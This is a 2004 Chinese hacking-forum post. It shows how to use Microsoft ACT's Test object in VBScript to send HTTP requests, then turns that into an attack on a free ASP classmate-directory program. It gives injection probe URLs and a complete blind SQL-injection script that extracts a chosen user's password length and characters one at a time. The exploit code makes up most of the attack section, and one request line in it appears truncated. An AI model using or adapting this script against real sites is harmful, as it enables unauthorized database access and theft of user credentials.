黑色海岸线论坛 - Powered by Discuz! Board

标题: 用vbs来写sql注入等80端口的攻击脚本 [打印本页]

作者: abmark 时间: 2004-11-30 15:59 标题: 用vbs来写sql注入等80端口的攻击脚本

昨天晚上在机器里乱翻时无意打开一个vbs脚本,突然发现一个以前没有见过的对象Test.SendRequest("http://" & g_sServer & "/testfiles/browser.asp"),虽然对象没有见过,但是意思很明显:发送http请求。本来以为是WMI script API的东东,但是没有找到创建对象的语句,这个脚本在Microsoft ACT里,Microsoft ACT是Visual Studio.Net带的一个测试站点的工具,以前打开过,但是没有研究过如何使用,于是我打开帮助文件(查过MSDN里有:ms-help://MS.VSCC/MS.MSDNVS.2052/act/htm/actml_main.htm),大致的读了一下,竟然是一整套的HTTP客户端对象(不知道这样说是不是准确),把对象和属性列出来,你看了就可以知道了,以下是Test对象模型,还有个application对象模型,如果你有深入了解的兴趣请看msdn,我还在学习中: -Connection对象 Close方法 Send方法 IsOpen属性 Port属性 RedirectDepth属性 Server属性 UseSSL属性 -Cookie对象//因为是测试站点的,用脚本程序模拟多用户,这个可以用来设置每个用户的cookie,那也该可以用来做手脚,呵呵 Expires属性 Name属性 Path属性 value属性 -Cookies对象 Add方法 Remove方法 RemoveAll方法 Count属性 Item属性 -Header对象 Name属性 value属性 -Request对象 Body属性 CodePage属性 EncodeBody属性 EncodeQueryAsUTF8属性 Headers属性 HTTPVersion属性 Path属性 ResponseBufferSize属性 Verb属性 -Response对象 Body属性 //获取 HTTP 响应的正文。仅返回响应缓冲区中的正文部分。 CodePage属性 BytesRecv属性 BytesSent属性 ContentLength属性 Headers属性 HeaderSize属性 HTTPVersion属性 Path属性 Port属性 ResultCode属性 HTTP状态代码 Server属性 TTFB属性 TTLB属性 UseSSl属性 -Test对象 CreateConnection方法 CreateRequest方法 GetCurrentUser方法 GetGlobalIndex方法 GetGlobalVariable方法 GetNextUser方法 IncrementGlobalIndex方法 SendRequest方法 SetGlobalIndex方法 SetGlobalVariable方法 Sleep方法 Trace方法 TraceLevel属性 -User对象 Cookies属性 Name属性 Password属性到此,你也许会想到很多用处,比如测试站点,测试服务器,测试程序,Cookie伪造...看你的想象力了,我第一件感兴趣的是开头提到的那句:Test.SendRequest("http://" & g_sServer & "/testfiles/browser.asp"),Test对象的SendRequest方法说明: oResponse = Test.SendRequest(strURL) 参数:strURL as string:表示所请求的URL 返回值:oResponse As Reponse:表示代表响应请求的Web服务器响应的对象(就是上面的Response对象) 这个对象让我们可以很容易的写出针对80端口的攻击程序,如溯雪的功能,现在流行sql injection,网上的sql injection的攻击程序大都用perl写的,我又不会perl,用C写一个完整的socket程序相对烦琐一些,是这个对象为vbs提供了可能,而且程序相当简单,虽然牺牲了效率,但是对于我们菜鸟不失为一个好办法,下面就举一个例子来说明: 风月同学录是一套免费的asp同学录程序,可能你没有听说过,不过在同学录类的免费web程序中算是功能出色的了,所以有不少站点采用了或者修改后使用了它(我念过的那所高中的网站的同学录就是用的这套程序改写的),我手上有V1.60,去年从网上down下来的,写这篇时在寝室,上不了网,也无法得到最新的版本了,反正也只是个例子,就凑合用吧,呵呵。大致看了一些代码发现多处可以注入的地方,最明显(因为在首页就看到)的就是它的一个论坛形式的留言板ShowThread.asp里: ... topicid=request("RootID") sql="select topic,hits from bbs where parentid=0 and bbsid="&topicid set rs=conn.execute(sql) ... 非常古老且经典的一个,呵呵,试了下: http://192.168.101.16/txl/ShowThrea...D=7%20and%201=1 http://192.168.101.16/txl/ShowThrea...D=7%20and%201=2 数据表结构我都知道,用户名也都可以在用户列表看出来,那么这个例子就演示一下猜解密码,什么?太简单了?只是个例子嘛,别笑哦~~写的时候也不是一帆风顺~~写的很差,尤其循环里如果探测到正确的就应该退出循环,但是想不起来怎么退出了(break?exit?),不过对于这个密码明文存放的程序来说已经够了,一个6位的密码用了15秒左右猜出,改进下会提高不少,但效率上始终和perl不能比了。要使用这个对象要装Microsoft ACT是Visual Studio.Net里一个工具,我在另一台机器上直接用regsrv32注册相关的dll失败了,所以还是要装一下。 '********************************************* '风月同学录V1.60漏洞测试脚本 by luoluo '注意:需要装Visual Studio.Net里的ACT工具 '********************************************* Option Explicit On Error Resume Next Dim Test Dim o_Response Dim Wrong Dim i,j,k Dim pwd_len Dim pwd Dim strings Dim username '从命令行得到要破解的人的用户名 If WScript.Arguments.Count > 0 Then username = WScript.Arguments(0) Else username = "luoluo" End If WScript.Echo "开始探测,请等待... ..." '正确页面的标志,这个随便找的,因为只要是两个页面返回的不同部分就可以了 Wrong = "luoluoisachinesehacker" '存放密码 pwd = "" '密码的字符范围 strings = "0123456789abcdefghijklmnopqrstuvwxyz" '建立对象 Set Test = CreateObject("ACT.Test") '得到用户的密码的长度 For i = 0 to 128 step 1 '发送请求,返回一个Response对象,地址长可以用&分成段,那样好看一些 Set o_Response = Test.SendRequest(" & i & "'%20and%20userid='" & username & "')") '如果返回的页面里有正确标志那么长度就对了 If instr(o_Response.Body, Wrong) <> 0 Then pwd_len = "" & i & "" End If Next '猜解用户的密码 For j = 1 to pwd_len step 1 For k = 1 to len(strings) step 1 Set o_Response = Test.SendRequest("http://192.168.101.16/txl/ShowThread.asp?RootID=7%20and%20exists%20(select%20userid%20from%20student%20where%20left(userpwd," & j & ")='" & pwd & mid(strings,k,1) & "'%20and%20userid='" & username & "')") If instr(o_Response.Body, Wrong) <> 0 Then pwd = pwd & mid(strings,k,1) End If Next Next If err Then WScript.Echo "错误:" & Error.Description Error.Clear Else '输出密码 WScript.Echo "密码:" & pwd End If Set Test = nothing

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)